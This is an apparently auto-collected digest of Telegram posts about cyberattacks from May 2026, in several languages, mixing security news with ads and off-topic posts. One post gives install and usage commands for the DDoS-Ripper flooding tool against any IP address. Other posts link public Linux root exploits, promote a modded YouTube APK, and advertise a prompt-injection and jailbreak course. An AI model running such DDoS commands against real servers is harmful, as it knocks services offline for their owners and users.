EventCyberattackMay 2026

Cyberattack — May 2026

What Telegram channels wrote about Cyberattack in May 2026: 143 posts from 113 channels, collected automatically from public Telegram channels.

143 posts·113 channels

Top story

most viewed post
🔥 Most popular
А
Айтишник
@it_teech
53.7K

Людей научились вычислять по Wi-Fi с точностью почти 100%. Стороннее оборудование не нужно — достаточно ноутбука.

Система BFId распознает человека по его физическим характеристикам и манере движения. Она опирается на сигнал, который точки доступа передают при обычной работе, — без взлома или прямого доступа к роутеру.

Этот сигнал можно перехватить любым современным гаджетом.

🗣️ Айтишник

More from other channels

143 posts total
K
Kiwi Farms
@kiwifarms
15.1K

The Kiwi Farms was targeted with a historic DDoS attack last week. Confirmed reports of 2.8Tbps on an individual provider, topping 4.8Tbps when known volumes are added together, and possibly up to 8Tbps if the attacker is believed. This is the third or fourth largest recorded.

N
Noob Hackers
@noobhackersyoutube
5.7K

🛡️ 𝗪𝗛𝗔𝗧 𝗜𝗦 𝗘𝗧𝗛𝗜𝗖𝗔𝗟 𝗛𝗔𝗖𝗞𝗜𝗡𝗚? 𝙃𝙤𝙬 𝙩𝙤 𝙎𝙩𝙖𝙧𝙩 𝙔𝙤𝙪𝙧 𝘾𝙮𝙗𝙚𝙧 𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙅𝙤𝙪𝙧𝙣𝙚𝙮 🚀

*Learn the basics of:* ✅ _Cyber Security_ ✅ _Ethical Hacking_ ✅ _Online Safety_ ✅ _Beginner Hacking Concepts_ ✅ _Career Guidance in Cyber Security_

📚 𝗗𝗘𝗠𝗢 𝗠𝗢𝗗𝗨𝗟𝗘: https://invite.lnkuv.in/dayone

🎁 𝗖𝗟𝗔𝗦𝗦: FREE ⏰ 𝗧𝗜𝗠𝗘: 7:00 PM – 8:00 PM (IST)

🔗 𝗝𝗢𝗜𝗡 𝗖𝗟𝗔𝗦𝗦: https://classonlineweb.blogspot.com/?play=vd1&m=1

📲 𝗝𝗢𝗜𝗡 𝗢𝗨𝗥 𝗖𝗢𝗠𝗠𝗨𝗡𝗜𝗧𝗬:

+918792228315

https://t.me/noobhackersyoutube

━━━━━━━━━━━━━━━━━━ > ⚡ Start your Ethical Hacking journey today! > Limited seats > Beginners Welcome ━━━━━━━━━━━━━━━━━━

D
damagelabxss
@damagelabxss
889

DDoS-атака за $5: как рынок кибератак превратился в полноценный сервис

Исследование Flare показало: рынок DDoS-as-a-Service за три года вырос в 10 раз — от разрозненных скриптов до брендированных платформ с поддержкой 24/7 и тарифными планами.

Цифры роста (2023 → 2026):

• Рекламных объявлений об услугах DDoS: 38 → 364 (~10x) • Уникальных продавцов: 15 → 41 (~3x) • Источников на даркнете: 22 → 43 (~2x)

Что предлагают в 2026 году:

Продавцы конкурируют как легальные SaaS-сервисы: • Удобная веб-панель и API-доступ • Атаки L4 и L7, обход Cloudflare • Мониторинг, аналитика, 24/7 поддержка • Перепродажа и реферальные программы • Конфиденциальность и «без логов»

Цены на атаки:

• Атака на 1 час — $5 • Атака на сайт — $10 • 24-часовая атака — $25 • День атаки на защищённую цель — $200–$500 • Ботнет-инфраструктура под ключ — $2 000

Масштаб реальных атак:

• Cloudflare заблокировал атаку 31,4 Тбит/с в Q4 2025 • Microsoft Azure отразил атаку 15,72 Тбит/с в октябре 2025 (ботнет Aisuru)

Главный вывод:

DDoS больше не требует технических знаний. Любой желающий может купить атаку через панель за несколько минут. Это означает, что за серьёзной кибератакой может стоять совершенно неподготовленный злоумышленник — и защита должна учитывать это.

#кибербезопасность #DDoS #даркнет #киберугрозы

Xss.pro 🔑

Ж
Железный гений
@irongenius
371

🚨Девушка, которая взломала систему научных публикаций, запускает ИИ на базе 88 миллионов научных статей

В 22 года Александра Элбакян создала Sci-Hub – один из самых спорных и влиятельных проектов в истории науки.

В 2011 году, будучи студенткой из Казахстана, Эльбакян столкнулась с тем, что доступ к одной статье мог стоить $30-50. Для многих исследователей за пределами богатых университетов это фактически означало невозможность заниматься наукой.

Sci-Hub автоматически получал статьи по DOI, сохранял копии и открывал к ним бесплатный доступ. За несколько лет проект превратился в гигантскую теневую библиотеку научных знаний.

📊По данным исследования eLife 2018 года, Sci-Hub уже тогда покрывал около 85,1% всех платных научных статей.

Сегодня архив Sci-Hub, по разным оценкам, содержит около 88 миллионов научных работ и используется исследователями по всему миру.

Теперь проект заходит в эпоху ИИ.

По сообщениям пользователей, Sci-Hub запустил экспериментального ИИ-ассистента Sci-Bot, который отвечает на вопросы, используя статьи из своей базы. Пока система ограничена: хуже работает с новыми исследованиями и сложными follow-up вопросами. Но сама идея уже меняет правила игры.

Для издательств Sci-Hub – это нарушение авторских прав. Например, Elsevier ранее выиграл многомиллионный судебный иск против проекта.

Для сторонников – это попытка сделать научные знания доступными не только элитным университетам и корпорациям.

❓И главный вопрос здесь гораздо шире самого Sci-Hub:

Кому вообще должна принадлежать наука – издательствам, университетам или обществу?

К
Книги для программистов
@bfbook
8.2K

🚀 Подборка полезных IT каналов в Max

Системное администрирование, DevOps 📌

https://max.ru/i_odmin Все для системного администратора https://max.ru/bash_srv Bash Советы https://max.ru/sysadminof Книги для админов, полезные материалы https://max.ru/i_odmin_book Библиотека Системного Администратора https://max.ru/i_devops DevOps: Пишем о Docker, Kubernetes и др. https://max.ru/tipsysdmin Типичный Сисадмин

Excel лайфхак 📌 https://t.me/Excel_lifehack Excel лайфхак

1C разработка 📌 https://max.ru/odin1c_rus Cтатьи, курсы, советы, шаблоны кода 1С

Программирование C++📌 https://max.ru/cpp_lib Библиотека C/C++ разработчика

Программирование Go📌 https://max.ru/golang_lib Библиотека Go (Golang) разработчика

Программирование React📌 https://max.ru/react_lib React

Программирование Python 📌 https://max.ru/python_of Python академия. https://max.ru/BookPython Библиотека Python разработчика

Java разработка 📌 https://max.ru/bookjava Библиотека Java разработчика

GitHub Сообщество 📌 https://max.ru/githublib Интересное из GitHub

Базы данных (Data Base) 📌 https://max.ru/database_info Все про базы данных

Фронтенд разработка 📌 https://max.ru/frontend_1 Подборки для frontend разработчиков

Библиотеки 📌 https://max.ru/programmist_of Книги по программированию https://max.ru/proglb Библиотека программиста https://max.ru/bfbook Книги для программистов

Программирование 📌 https://max.ru/bookflow Лекции, видеоуроки, доклады с IT конференций https://max.ru/itmozg Программисты, дизайнеры, новости из мира IT https://max.ru/php_lib Библиотека PHP программиста 👨🏼‍💻👩‍💻

Шутки программистов 📌 https://max.ru/itumor Шутки программистов

Защита, взлом, безопасность 📌 https://max.ru/thehaking Канал о кибербезопасности https://max.ru/xakkep_1 Хакер Free

Книги, статьи для дизайнеров 📌 https://max.ru/odesigners Статьи, книги для дизайнеров

Математика 📌 https://max.ru/Pomatematike Канал по математике https://max.ru/phismat_1 Обучающие видео, книги по Физике и Математике

Вакансии 📌 https://max.ru/progjob Вакансии в IT

Мир технологий 📌 https://max.ru/mir_teh Канал для любознательных

Бонус 📌 https://max.ru/piterspb_78 Свежие новости Санкт-Петербурга https://max.ru/mockva_life Свежие новости Москвы https://max.ru/piterspb Питер Новости: Санкт-Петербург / СПБ / ДТП

Ч
Черная книга капитализма | ЧКК
@black_book_of_capitalism
3.7K

❗️ Почему опасно «голосовать» на праймериз «Единой России»?

Ранее я уже делал пост про проблемы безопасности «национального мессенджера» MAX, где поднял вопросы крупных скандалов и багов, а также тему роста числа мошенничества. Но там мы хотя бы знали имена разработчиков и бенефициаров. А с предварительным «голосованием» «Единой России» (ЕР), мы даже не знаем, кто разработчик сайта. В открытых источниках нет информации о том, кто разработчик сайта. Максимум что мы можем получить из доступной информации, так это данные, что разработка и поддержка сайта осуществляются IT-отделом партии «Единая Россия». И даже не факт, что этот самый IT-отдел находится в России.

Интересна также и политика конфиденциальности сайта, где прямо указано, что ЕР может использовать ваши данные «для обеспечения возможности участия граждан в агитационно-массовой и пропагандистской работе». Что под этим понимается, вовсе не ясно. Помимо ФИО, даты рождения, адреса электронной почты и личной фотографии, Едроссам зачем-то необходима фотография вашего паспорта. Также данные вашего паспорта, ИНН, адрес регистрации и фактического проживания, семейное положение, количество ваших детей, сведения о вашем дипломе/аттестате, сведения о месте работы и должности и сведения о наличии или отсутствии судимости и привлечения к административной ответственности - все они уходят напрямую «Единой России» через привязку к Госуслугам. А еще автоматически при посещении сайта вы передаёте не пойми кому следующие данные: IP-адрес, информация из файлов cookie, информация о браузере, время доступа, адрес предыдущей страницы и метаданные о пользовательском устройстве. Без каких-либо дополнительных уведомлений «Единая Россия» может осуществлять спам-рассылку на вашу электронную почту и номер телефона.

Информация хранится «до момента прекращения деятельности Оператора», а учитывая, что праймериз ЕР существует уже много лет, можно сказать что так будет вплоть до роспуска партии или её запрета. А также данные могут передаваться третьим лицам и «Единая Россия» не несет за это ответственности. Стоит ли говорить о том, что базы данных в России регулярно оказываются в руках мошенников? Особенно, учитывая, что сами члены партии ЕР регулярно становятся обвиняемыми по делах о мошенничестве и коррупции. Собственно, поэтому неофициальное название партии «Единая Россия» - партия жуликов и воров. Стоит ли напоминать, что мошенники также активно используют фишинг и создают поддельные сайты предварительного «голосования» ЕР? Хотя, в прошлые выборы в Госдуму, едроссы сами использовали взломанные аккаунты Госуслуг, чтобы массово накручивать себе же голоса.

Это всё усиливается тем, что жулики-едроссы принуждают к «голосованию» работников бюджетной сферы (врачей, учителей, МЧСников, сотрудников правоохранительных органов и тд). Принуждение к участию в праймериз «Единой России» может считаться нарушением трудовых договоров, КоАП РФ и УК РФ. Да что там, даже оппозиционеры призывают свою аудиторию «проголосовать» - якобы смена жуликов у кормушки поможет бороться с блокировками Интернета. Разумеется, это всё бред: либо по глупости, либо по политическому заказу распространяются такие нарративы.

🤢 Долой ЕдРо - долой жуликов и воров! Не учувствуйте в этом цирке под названием предварительное «голосование» «Единой России». Предупредите родных и близких.

А
Арбітражич | Affiliate Media • CPA • Traffic
@arbitrazhych
281

🥸 #Арбітражич_Підказує | Як не поховати кампанію під час масштабування

Одна з найболючіших помилок баєра побачити нормальний конверт, зрадіти, влупити бюджет х2 і через день дивитися, як кампанія летить у смітник. Бо масштабування це не кнопка зробити більше грошей.

1️⃣ Не піднімай бюджет різко Якщо кампанія стабільно ллється, не треба одразу заливати її грошима так, ніби ти знайшов друкарський станок. Нормальний варіант піднімати бюджет поступово: приблизно на 15–20% раз на добу або навіть рідше, якщо бачиш, що система ще не стабілізувалась.

2️⃣ Дивись не тільки на spend, а на якість Більший бюджет не означає кращий результат. Кампанія може почати швидше відкручуватися, але тягнути дорожчий клік, слабший лід або менш якісного юзера. На папері ти ніби масштабуєшся, а по факту просто швидше спалюєш гроші. Тому перед апом бюджету дивись на базу: чи тримається CPA, чи не падає конверт, чи є нормальна частота, чи не почав креатив вигорати.

3️⃣ Різкі рухи можуть привернути зайву увагу У ризикових вертикалях агресивний ап бюджету може не тільки зламати оптимізацію, а й швидше привести кампанію до перевірок, реджектів або банів. Особливо якщо сетап і так стоїть на тонкому льоду.

🚀 Арбітражич | Affiliate Media • CPA

M
meetwenura
@meetwenura
1.3K

𝐀𝐈 𝐒𝐊𝐈𝐋𝐋𝐒 𝐅𝐄𝐒𝐓 𝟐𝟎𝟐𝟔 A free global virtual event designed for developers, IT professionals, business leaders, students, and anyone curious about AI. June 8–12, 2026 https://aiskillsnavigator.microsoft.com/events/AISF2026 Live sessions with Microsoft experts AI agent hackathons & practical workshops Certification prep sessions Free certification exam opportunities Digital badges, prizes & community networking

D
datasciencej
@datasciencej
2.8K

✅ Data Science Interview Prep Guide 📊🧠

Whether you're a fresher or career-switcher, here’s how to prep step-by-step:

1️⃣ Understand the Role Data scientists solve problems using data. Core responsibilities: • Data cleaning & analysis • Building predictive models • Communicating insights • Working with business/product teams

2️⃣ Core Skills Needed ✔️ Python (NumPy, Pandas, Matplotlib, Scikit-learn) ✔️ SQL ✔️ Statistics & probability ✔️ Machine Learning basics ✔️ Data storytelling & visualization (Power BI / Tableau / Seaborn)

3️⃣ Key Interview Areas

A. Python & Coding • Write code to clean and analyze data • Solve logic problems (e.g., reverse a list, group data by key) • List vs Dict vs DataFrame usage

B. Statistics & Probability • Hypothesis testing • p-values, confidence intervals • Normal distribution, sampling

C. Machine Learning Concepts • Supervised vs unsupervised learning • Overfitting, regularization, cross-validation • Algorithms: Linear Regression, Decision Trees, KNN, SVM

D. SQL • Joins, GROUP BY, subqueries • Window functions • Data aggregation and filtering

E. Business & Communication • Explain model results to non-tech stakeholders • What metrics would you track for [business case]? • Tell me about a time you used data to influence a decision

4️⃣ Build Your Portfolio ✅ Do projects like: • E-commerce sales analysis • Customer churn prediction • Movie recommendation system ✅ Host on GitHub or Kaggle ✅ Add visual dashboards and insights

5️⃣ Practice Platforms • LeetCode (SQL, Python) • HackerRank • StrataScratch (SQL case studies) • Kaggle (competitions & notebooks)

💬 Tap ❤️ for more!

D
DeepWeb
@deepwebita
17.4K

⁣🚨 CISA lancia l’allarme: vulnerabilità Microsoft e Adobe sfruttate attivamente negli attacchi

La CISA ha aggiornato il catalogo delle Known Exploited Vulnerabilities (KEV) aggiungendo nuove falle di sicurezza che colpiscono prodotti Microsoft e Adobe, già sfruttate in attacchi reali. Tra le vulnerabilità segnalate figurano bug che permettono escalation di privilegi, bypass delle protezioni di sicurezza ed esecuzione di codice remoto.

Secondo gli esperti, alcune delle falle riguardano componenti legacy ancora presenti in molte infrastrutture enterprise, mentre altre interessano sistemi più recenti come Windows Defender e Microsoft Exchange. La presenza nel catalogo KEV indica che gli exploit sono già utilizzati da gruppi cybercriminali e operatori ransomware, aumentando il rischio per aziende e PA.

CISA raccomanda l’applicazione immediata delle patch e una revisione delle policy di vulnerability management, soprattutto per ambienti esposti su Internet o con sistemi non aggiornati.

🔗 Fonte: CISA

#cybersecurity #CISA #Microsoft #Adobe #KEV #vulnerability #infosec #patchmanagement #ransomware

✍🏻 @DeepWebITA 👥 @DeepWebITAGroup

А
Антиэйдж Хаб | как сохранить молодость
@goyazikoved1
676

🏷 БИОХАКИНГ 🔥 ХРОНОЕДА: ВРЕМЯ ВАЖНЕЕ КАЛОРИЙ

Раннее окно питания (до 16:00–18:00) снижает инсулинорезистентность без похудения. Закрывайте метаболическое окно минимум за 4 часа до сна.

Все знают про интервальное голодание (16:8), но большинство практикует его в корне неверно — пропуская завтрак и плотно ужиная на ночь. Это фатальная ошибка с точки зрения циркадной биологии. В организме есть два типа часов: центральные в мозге (настраиваются по свету) и периферические в печени, мышцах и поджелудочной железе (синхронизируются по приему пищи). Когда вы едите в 21:00, мозг уже вырабатывает мелатонин и готовится ко сну, а ЖКТ получает сигнал «день в самом разгаре». Этот рассинхрон — метаболический джетлаг — ведет к снижению чувствительности к инсулину и накоплению висцерального жира, даже если вы находитесь в дефиците калорий.

Современная доказательная медицина делает ставку на хрононутрициологию и раннее окно питания (early Time-Restricted Eating, eTRF). Поджелудочная железа максимально активна утром: в это время чувствительность клеток к инсулину и функция бета-клеток находятся на пике. В клинических испытаниях перенос пищевого окна на первую половину дня (до 15:00–16:00) кардинально улучшал биохимию. У пациентов снижалось артериальное давление, уровень окислительного стресса и инсулинорезистентность — причем эти изменения происходили абсолютно без потери веса. Вы просто не заставляете поджелудочную работать в часы ее физиологического спада.

Как это применить на практике? Если вы практикуете фастинг или просто хотите продлить healthspan, перестаньте экономить калории на вечер. Правило здорового метаболического окна: сытный завтрак, полноценный обед и легкий ранний ужин. Поздний прием пищи на фоне растущего мелатонина (через рецепторы MTNR1B в поджелудочной) напрямую подавляет секрецию инсулина — глюкоза дольше циркулирует в крови, гликируя белки и повреждая сосуды. Хотите взломать метаболизм и замедлить старение — закрывайте «пищевое окно» до захода солнца.

📚 Источники: 🔗 Early Time-Restricted Feeding Improves Insulin Sensitivity, Blood Pressure, and Oxidative Stress Even without Weight Loss in Men with Prediabetes (Cell Metabolism): https://pubmed.ncbi.nlm.nih.gov/29754952/ 🔗 Chrononutrition and Energy Balance: How Meal Timing and Circadian Rhythms Shape Weight Regulation and Metabolic Health (PMC, 2025): https://www.ncbi.nlm.nih.gov/pmc/articles/PMC11202874/

(Не является медицинской рекомендацией)

#Биохакинг #Еда #АнтиЭйдж #Зож #Долголетие

Б
Бизнес Час
@bizneshour
399

🤯 ЦБ планирует ограничить вложения российских банков в криптовалюту — объём таких инвестиций не должен превышать 1% капитала банка. При расчёте капитала криптоактивы предлагается учитывать как почти максимально рискованные с коэффициентом 1250%, поскольку регулятор видит угрозы не только в их волатильности, но и в возможной блокировке.

Клиентская криптовалюта под ограничения не попадёт, если банк выступает лишь депозитарием. Однако требования к безопасности хранения всё равно хотят ужесточить из-за рисков взломов и потери доступа к активам.

НА ВСЯКИЙ СЛУЧАЙ БИЗНЕС ЧАС В MAX 📲

Д
Дина, Коллекция Рецептов
@dinarecipes
28.8K

⚠️ Друзья, идет АТАКА МОШЕННИКОВ! Участникам группы приходят сообщения со ссылкой, перейдя по которой ваши аккаунты будут взломаны! НЕ переходите по каким либо ссылкам! Будьте внимательны!

ا
المخلافي للمعلومات والتقنية((🇵🇸🇾🇪))
@almekhlafi2020
12.9K

⚡️Update | تحديث  ⚡️

📺تحميل تطبيق يوتيوب بريميوم مهكر بدون اعلانات مجانا للأندرويد اخر اصدار

📺Download the hacked YouTube Premium app without ads for free for Android

⚠️لحل مشكلة توقف الفيديوهات أدخل إلى الإعدادات ReVanced وثم خيار Miscellaneous (خيارات متنوعة) وثم من خيار Spoof steaming Data فعل الخيار Spoof steaming Data وستعمل معك الفيديوهات بدون أي مشاكل.⚠️

📆 29-05-2026

🔟التصنيف : تطبيقات الاندرويد

📎تحميل تطبيق يوتيوب بريميوم اخر اصدار + التطبيق المساعد اخر اصدار + التطبيق الخاص بالتحميل للفيديوهات

📎Download the YouTube Premium application + the plugin application, latest version + the application for downloading videos 🏇🏇🏇🏇 🌐https://almekhlafi-soft.net/youtube-premium/ ⬆️⬆️⬆️⬆️ 📱لتنضم الى القناة الاحتياطية لنشر التطبيقات بصيغة apk اضغط هنا

😍قناتنا على واتساب لتنضم اليها عن طريق الرابط التالي اضغط هنا 🚩🚩🚩🚩🚩🚩🚩🚩🚩🚩

P
purple shift
@purpleshift
2.7K

На днях наши эксперты поучаствовали в одной скромной, зато очень неформальной ИБ-конференции под названием ЁPRSTCON.

Основной темой выступлений технического трека стали проблемы информационной безопасности в эпоху всеобщего помешательства на AI. Но были доклады и на другие интересные темы. Например, о том,

— почему до сих пор можно делать RCE через умерший IE, — откуда в RDP-логах мистический артефакт ::%16777216, — зачем нужно писать собственный сканер уязвимостей, — как устроены хакерские сообщества в разных странах, — как реверсить микроконтроллеры AVR.

Поддерживая дух этой неформальной тусовки, мы не будем назвать имена крутых докладчиков и их компании, а просто дадим вам главную ссылку — где можно посмотреть видеозаписи всех технических докладов, с текстовыми транскриптами и слайдами:

https://www.yoprstcon.ru/articles_manual_locB_html/

А ещё на конференции был гуманитарный трек — там рассказывали, как искусственный интеллект вытесняет музыкантов и писателей, какие психозы возникают от долгого общения с LLM-агентами, и каким методам родительской заботы можно поучиться у африканских лягушек. Записи гуманитарных докладов здесь: https://www.yoprstcon.ru/articles_manual_locA_html/

�
🔒Seguridad Informática
@seguridadinformatic4
6.5K

Vulnerabilidades Linux

Ya compartimos alguna: https://t.me/seguridadinformatic4/5281

📃 "CISA alerta de explotación activa de Copy Fail para obtener root en Linux" https://unaaldia.hispasec.com/cisa-alerta-de-explotacion-activa-de-copy-fail-para-obtener-root-en-linux/ 📃 "De copy-fail a DirtyFrag: cuando el zero-copy rompe el modelo de seguridad" https://www.hackplayers.com/2026/05/dirtyfrag-cuando-el-zero-copy-rompe-modelo.html 📃 "Dirty Frag: (otra) vulnerabilidad de escalamiento local en el Kernel de Linux" https://blog.segu-info.com.ar/2026/05/dirty-frag-otra-vulnerabilidad-de.html 📃 "Dirty Frag: la nueva vulnerabilidad zero-day en Linux con PoC público que permite escalar privilegios a root en múltiples distribuciones" https://unaaldia.hispasec.com/dirty-frag-la-nueva-vulnerabilidad-zero-day-en-linux-con-poc-publico-que-permite-escalar-privilegios-a-root-en-multiples-distribuciones/ 🛠 Dirty Frag https://github.com/V4bel/dirtyfrag 📃 "(Otro) escalamiento local en Linux (DirtyDecrypt / DirtyCBC)" https://blog.segu-info.com.ar/2026/05/otro-escalamiento-local-en-linux.html 📃 "Fragnesia: nueva escalada de privilegios crítica en Linux. Y ya va tres en muy poco tiempo" https://www.linuxadictos.com/fragnesia-nueva-escalada-de-privilegios-critica-en-linux-y-ya-va-tres-en-muy-poco-tiempo.html 🛠 https://github.com/v12-security/pocs/blob/main/fragnesia%2FREADME.md 📃 "ssh-keysign-pwn: nuevo riesgo crítico en el kernel Linux, porque no hay tres sin cuatro" https://www.linuxadictos.com/ssh-keysign-pwn-nuevo-riesgo-critico-en-el-kernel-linux-porque-no-hay-tres-sin-cuatro.html

Н
Новостной фронт
@newsfrontruss
5.3K

Взлом или маркетинг?

В телеграмме массово продают реестры с персональными данными украинцев - ФИО, адреса регистрации и проживания, телефоны, иногда даже сканы паспортов и ИНН. Объёмы приличные. Продавцы уверяют, что это «свежие базы ТЦК». По опыту, такие утечки - это уже даже не красный флаг, а просто привычный фон. Такое было ещё в 2022-м, когда первые «списки уклонистов» и данные из военкоматов начали гулять по даркнету и закрытым чатам. Потом повторялось в 23-м, в 24-м. Классика.

Теперь вопрос, который все задают - кто сливает? Чистые хакеры или свои же сотрудники ТЦК решили подзаработать на стороне? Я бы не стал так оптимистично делить на «хороших хакеров» и «плохих военкомов». Скорее всего, и то, и другое. С одной стороны, украинские базы традиционно дырявые, как решето. Ещё с времён старых интеграций с разными реестрами, когда всё тянули в одну кучу без нормальной сегментации. Плюс вечная проблема с доступами - у кого-то в ТЦК сидит племянник, у того друг, а у друга «нужны данные по району». Знакомая история.

С другой стороны - мотивация у тцкашников сейчас очень даже понятная. Зарплаты не радуют, риски высокие, а тут можно просто «слить файл» и получить неплохую прибавку. Особенно если человек понимает, что завтра его самого могут отправить на передок или под трибунал за перегибы. Выживание, оно такое. Самое смешное (ну или грустное, смотря с какой стороны смотреть), что эти базы теперь могут быть использованы как рекламщиками, так и мошенниками, а значит все те, чьи данные утекли – находятся под угрозой.

Это уже даже не удивительно, когда система построена на принуждении и тотальном контроле, а при этом внутри полный бардак и коррупция - результат предсказуем. Ещё один «прорыв в цифровизации» по-украински. Кому надо - тот уже понял, где смотреть и как проверять свои данные. Остальным остаётся надеяться, что их ФИО не ушло в очередной дамп за 15 баксов. Хотя, если честно, надежда тут слабая.

В общем, бизнес как обычно. Только вместо обычных товаров - человеческие судьбы. Ничего нового.

V
Vadim Zeland
@vadimzelands
5.7K

В мире маятников действует закон: фаворитами становятся только единицы, все остальные должны выполнять функции рядовых приверженцев и подчиняться установленным правилам системы. Трансерфинг не в состоянии нарушить этот закон, но он поможет взломать закон конкретно вам, если захотите. Маятники будут вынуждены включить вас в число фаворитов, если вы воспользуетесь уникальными качествами своей души.

C
CYBER HUNTER - Кибербезопасность
@cyberbezopasno
3.8K

✅ Запускаем DDoS атаку в терминале

DDoS-Ripper – инструмент, с помощью которого можно запустить DDoS-атаку на любой сервер. Также скрипт имеет гибкие настройки.

Установка в Termux: # pkg install python3 -y # git clone https://github.com/palahsu/DDoS-Ripper.git # cd DDoS-Ripper # python3 DRipper.py

Установка на Linux: # git clone https://github.com/palahsu/DDoS-Ripper.git # cd DDoS-Ripper # python3 DRipper.py

Использование: # python3 DRipper.py -s [ip-адрес] -t 135

M
Mawari Network Official Channel
@mawarinet
4.1K

Proud to collaborate with the best security team in the space to deliver the immersive internet we all deserve. 🔒

By partnering with Hacken we are ensuring that the Mawari Network is as secure as it is scalable.

You can read the full case study of our collaboration here 👇

https://hacken.io/case-studies/mawari-multi-layer-security/

Let's keep building. 🌐✨

A
aisecuritylab
@aisecuritylab
1.4K

📣 AI Security: практикум по безопасности ИИ-приложений

Исследователи из AI Security Lab Герман Кочнев @germKo и Иван Александров @ivanich_spb опубликовали вводный курс по секьюрити на платформе Stepik без кода и с большим количеством практики.

Курс CTF-чемпионат, где студент руками проходит путь от простых prompt injection и jailbreak до разведки и взлома агентских систем.

Что внутри:

⭐Prompt Injection и обход инструкций Jailbreak-техники и guardrails ⭐ Indirect Prompt Injection через письма, документы и веб ⭐атаки на агентов и отравление RAG ⭐защита: от простых фильтров до архитектурных решений

Формат курса - CTF-задачи: нужно сломать систему, получить флаг, разобрать, почему атака сработала и как это чинить. Есть демо-доступ.

➡️ Забирай курс с автоскидкой

Учимся ломать ИИ-приложения так, чтобы потом проектировать их безопаснее

H
hack_kap0
@hack_kap0
1.1K

𝐑𝐞𝐠𝐢𝐬𝐭𝐫𝐚𝐭𝐢𝐨𝐧 𝐟𝐨𝐫 𝐎𝐩𝐞𝐫𝐚𝐭𝐢𝐨𝐧 𝐇𝐞𝐢𝐬𝐭 2026 𝐢𝐬 𝐧𝐨𝐰 𝐋𝐈𝐕𝐄. 🚩

This is not a drill. The Professor's plan is in motion and the crew is assembling RIGHT NOW.

*24 𝐡𝐨𝐮𝐫𝐬 | 60+ 𝐜𝐡𝐚𝐥𝐥𝐞𝐧𝐠𝐞𝐬 | 𝐎𝐧𝐞 𝐬𝐡𝐨𝐭 𝐚𝐭 𝐭𝐡𝐞 𝐟𝐥𝐚𝐠*

🔹 13 – 14 June 2026 🔹 Up to 4 members per team

*𝐏𝐫𝐢𝐜𝐞 𝐏𝐨𝐨𝐥 :- 𝐋𝐊𝐑 𝟏𝟎𝟎,𝟎𝟎𝟎 + 𝐒𝐰𝐚𝐠 & 𝐕𝐨𝐮𝐜𝐡𝐞𝐫𝐬 🤩*

𝙺4𝙿{𝚛3𝚐1𝚜𝚝𝚛4𝚝10𝚗_1𝚜_𝚕1𝚟3}

𝐑𝐞𝐠𝐢𝐬𝐭𝐞𝐫 𝐧𝐨𝐰 : https://registration.hackkap.com 𝐂𝐨𝐦𝐩𝐞𝐭𝐢𝐭𝐢𝐨𝐧 𝐩𝐥𝐚𝐭𝐟𝐨𝐫𝐦 : https://ctf.hackkap.com

Seats are limited. The police are already watching. Don't wait.

Are you in? 👇

#OperationHeist2026 #hackkap #CTF2026 #Sysreptor #Hackviser #CaptureTheFlag #CyberSecurity